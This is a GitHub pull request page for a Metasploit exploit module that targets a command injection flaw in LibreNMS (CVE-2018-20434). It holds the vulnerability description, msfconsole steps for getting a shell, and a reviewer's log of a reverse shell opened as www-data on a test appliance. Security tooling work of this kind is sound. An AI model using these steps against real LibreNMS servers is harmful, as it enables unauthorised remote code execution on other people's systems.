Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add exploit module for LibreNMS CVE-2018-20434 #11895

Merged
merged 13 commits into from Jun 4, 2019

Conversation

Projects
None yet
5 participants
@space-r7
Copy link
Contributor

commented May 29, 2019

This module exploits a command injection vulnerability in the open source network management software known as LibreNMS. The community parameter used in a POST request to the addhost functionality is unsanitized. This parameter is later used as part of a shell command that gets passed to the popen function in capture.inc.php, which can result in execution of arbitrary code.

This module has been tested on LibreNMS v1.45 and v1.46.

Verification

  • Install the application
  • Start msfconsole
  • Do: use exploit/linux/http/librenms_cmd_injection
  • Do: set RHOSTS <ip>
  • Do: set USERNAME <user>
  • Do: set PASSWORD <pass>
  • Do: run
  • You should get a shell.

space-r7 added some commits May 24, 2019

space-r7 and others added some commits May 29, 2019

Update modules/exploits/linux/http/librenms_cmd_injection.rb
Co-Authored-By: bcoles <bcoles@gmail.com>
Update modules/exploits/linux/http/librenms_cmd_injection.rb
Co-Authored-By: bcoles <bcoles@gmail.com>
Update modules/exploits/linux/http/librenms_cmd_injection.rb
Co-Authored-By: bcoles <bcoles@gmail.com>

@jrobles-r7 jrobles-r7 self-assigned this May 30, 2019

space-r7 and others added some commits May 30, 2019

@wchen-r7

This comment has been minimized.

Copy link
Contributor

commented May 31, 2019

I'm actually done reviewing. Code looks good to me. Nice work @space-r7 !

@space-r7

This comment has been minimized.

Copy link
Contributor Author

commented May 31, 2019

I'm actually done reviewing. Code looks good to me. Nice work @space-r7 !

Thanks for the review!

@jrobles-r7

This comment has been minimized.

Copy link
Contributor

commented Jun 4, 2019

Using pre-built v1.46 OVA

msf5 exploit(linux/http/librenms_addhost_cmd_inject) > exploit

[*] Started reverse TCP double handler on 172.22.222.136:4444 
[*] Successfully logged into LibreNMS. Storing credentials...
[+] Successfully added device with hostname cJKrXaerk
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[+] Successfully deleted device with hostname cJKrXaerk and id #2
[*] Command: echo 4kWimSISfcFWx1in;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "4kWimSISfcFWx1in\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (172.22.222.136:4444 -> 172.22.222.141:35844) at 2019-06-04 12:17:04 -0500

whoami
www-data
uname -a
Linux librenms 4.15.0-39-generic #42-Ubuntu SMP Tue Oct 23 15:48:01 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux

@jrobles-r7 jrobles-r7 merged commit c93c65c into rapid7:master Jun 4, 2019

2 of 3 checks passed

Metasploit Automation - Sanity Test Execution Running automation sanity tests. Details available on completion.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details

jrobles-r7 added a commit that referenced this pull request Jun 4, 2019

msjenkins-r7 added a commit that referenced this pull request Jun 4, 2019

@jrobles-r7

This comment has been minimized.

Copy link
Contributor

commented Jun 4, 2019

Release Notes

A module that targets CVE-2018-20434 is now available. It exploits a command injection vulnerability in the open source network management software known as LibreNMS.

@space-r7 space-r7 deleted the space-r7:librenms_exploit branch Jun 5, 2019

@busterb busterb changed the title Add exploit module for CVE-2018-20434 Add exploit module for LibreNMS CVE-2018-20434 Jun 6, 2019

@tdoan-r7 tdoan-r7 added the rn-modules label Jun 11, 2019

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.